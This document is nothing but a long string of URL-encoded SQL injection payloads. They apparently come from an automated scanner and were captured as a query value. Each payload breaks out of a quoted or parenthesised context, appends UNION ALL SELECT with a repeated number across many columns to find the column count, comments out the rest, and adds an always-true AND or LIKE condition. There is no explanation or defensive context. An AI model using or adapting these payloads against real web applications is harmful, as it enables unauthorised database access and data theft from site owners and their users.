-9479%22%29%29%29%20UNION%20ALL%20SELECT%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749--%20%20AND%20%28%28%28%22sDNo%22%3D%22sDNo -3941%22%29%29%29%20UNION%20ALL%20SELECT%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379%2C%207379--%20%20AND%20%28%28%28%22MesW%22%3D%22MesW -4315%22%29%29%29%20UNION%20ALL%20SELECT%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570%2C%201570--%20%20AND%20%28%28%28%22nSkU%22%3D%22nSkU -3207%22%29%29%29%20UNION%20ALL%20SELECT%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877%2C%203877--%20%20AND%20%28%28%28%22ezKp%22%3D%22ezKp -3260%22%20UNION%20ALL%20SELECT%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564%2C%204564--%20%20AND%20%22auNx%22%3D%22auNx -6703%22%20UNION%20ALL%20SELECT%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247%2C%208247--%20%20AND%20%22YySw%22%3D%22YySw -9241%22%20UNION%20ALL%20SELECT%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679%2C%204679--%20%20AND%20%22xsZT%22%3D%22xsZT -7164%22%20UNION%20ALL%20SELECT%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814%2C%209814--%20%20AND%20%22HkYx%22%3D%22HkYx -1177%22%20UNION%20ALL%20SELECT%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855%2C%209855--%20%20AND%20%22BkLJ%22%3D%22BkLJ -3629%22%20UNION%20ALL%20SELECT%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477%2C%203477--%20%20AND%20%22nPuu%22%3D%22nPuu -4425%22%20UNION%20ALL%20SELECT%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198--%20%20AND%20%22EToY%22%3D%22EToY -4208%22%20UNION%20ALL%20SELECT%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435--%20%20AND%20%22zufI%22%3D%22zufI -4166%22%20UNION%20ALL%20SELECT%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210%2C%205210--%20%20AND%20%22eHel%22%3D%22eHel -5097%22%20UNION%20ALL%20SELECT%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214%2C%202214--%20%20AND%20%22IsQF%22%3D%22IsQF -9435%22%29%20UNION%20ALL%20SELECT%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271--%20%20AND%20%28%22aydv%22%20LIKE%20%22aydv -8001%22%29%20UNION%20ALL%20SELECT%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440--%20%20AND%20%28%22adcE%22%20LIKE%20%22adcE -9909%22%29%20UNION%20ALL%20SELECT%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495%2C%201495--%20%20AND%20%28%22ANff%22%20LIKE%20%22ANff -6060%22%29%20UNION%20ALL%20SELECT%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579--%20%20AND%20%28%22PtWN%22%20LIKE%20%22PtWN -7526%22%29%20UNION%20ALL%20SELECT%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424--%20%20AND%20%28%22IeBH%22%20LIKE%20%22IeBH -2702%22%29%20UNION%20ALL%20SELECT%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607%2C%201607--%20%20AND%20%28%22VLJR%22%20LIKE%20%22VLJR -2434%22%29%20UNION%20ALL%20SELECT%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396--%20%20AND%20%28%22rOXu%22%20LIKE%20%22rOXu -1837%22%29%20UNION%20ALL%20SELECT%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153--%20%20AND%20%28%22wLRX%22%20LIKE%20%22wLRX -5709%22%29%20UNION%20ALL%20SELECT%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904%2C%209904--%20%20AND%20%28%22BACY%22%20LIKE%20%22BACY -1548%22%29%20UNION%20ALL%20SELECT%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230%2C%201230--%20%20AND%20%28%22cqFF%22%20LIKE%20%22cqFF -1740%22%29%29%20UNION%20ALL%20SELECT%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411--%20%20AND%20%28%28%22Rasn%22%20LIKE%20%22Rasn -2539%22%29%29%20UNION%20ALL%20SELECT%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327--%20%20AND%20%28%28%22iewP%22%20LIKE%20%22iewP -3461%22%29%29%20UNION%20ALL%20SELECT%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244--%20%20AND%20%28%28%22Egxx%22%20LIKE%20%22Egxx -8537%22%29%29%20UNION%20ALL%20SELECT%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514--%20%20AND%20%28%28%22LFsO%22%20LIKE%20%22LFsO -6170%22%29%29%20UNION%20ALL%20SELECT%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346%2C%208346--%20%20AND%20%28%28%22gGMj%22%20LIKE%20%22gGMj -6534%22%29%29%20UNION%20ALL%20SELECT%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811--%20%20AND%20%28%28%22bSwD%22%20LIKE%20%22bSwD -6905%22%29%29%20UNION%20ALL%20SELECT%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089--%20%20AND%20%28%28%22oTzY%22%20LIKE%20%22oTzY -9192%22%29%29%20UNION%20ALL%20SELECT%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676%2C%204676--%20%20AND%20%28%28%22swBX%22%20LIKE%20%22swBX -5560%22%29%29%20UNION%20ALL%20SELECT%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743--%20%20AND%20%28%28%22jRAs%22%20LIKE%20%22jRAs -3318%22%29%29%20UNION%20ALL%20SELECT%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535--%20%20AND%20%28%28%22mXHF%22%20LIKE%20%22mXHF -1068%22%29%29%29%20UNION%20ALL%20SELECT%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859%2C%202859--%20%20AND%20%28%28%28%22lNsD%22%20LIKE%20%22lNsD -8863%22%29%29%29%20UNION%20ALL%20SELECT%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478%2C%203478--%20%20AND%20%28%28%28%22URDy%22%20LIKE%20%22URDy -3723%22%29%29%29%20UNION%20ALL%20SELECT%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669%2C%203669--%20%20AND%20%28%28%28%22KxuH%22%20LIKE%20%22KxuH -9704%22%29%29%29%20UNION%20ALL%20SELECT%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511%2C%206511--%20%20AND%20%28%28%28%22EejT%22%20LIKE%20%22EejT -7190%22%29%29%29%20UNION%20ALL%20SELECT%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809--%20%20AND%20%28%28%28%22zrdj%22%20LIKE%20%22zrdj -2735%22%29%29%29%20UNION%20ALL%20SELECT%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321%2C%203321--%20%20AND%20%28%28%28%22exNH%22%20LIKE%20%22exNH -7732%22%29%29%29%20UNION%20ALL%20SELECT%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610%2C%204610--%20%20AND%20%28%28%28%22GtZO%22%20LIKE%20%22GtZO -8825%22%29%29%29%20UNION%20ALL%20SELECT%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489%2C%206489--%20%20AND%20%28%28%28%22tumc%22%20LIKE%20%22tumc -5981%22%29%29%29%20UNION%20ALL%20SELECT%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140%2C%204140--%20%20AND%20%28%28%28%22emmW%22%20LIKE%20%22emmW -1668%22%29%29%29%20UNION%20ALL%20SELECT%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643%2C%206643--%20%20AND%20%28%28%28%22zBUi%22%20LIKE%20%22zBUi -8229%22%20UNION%20ALL%20SELECT%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889%2C%206889--%20%20AND%20%22eVuH%22%20LIKE%20%22eVuH 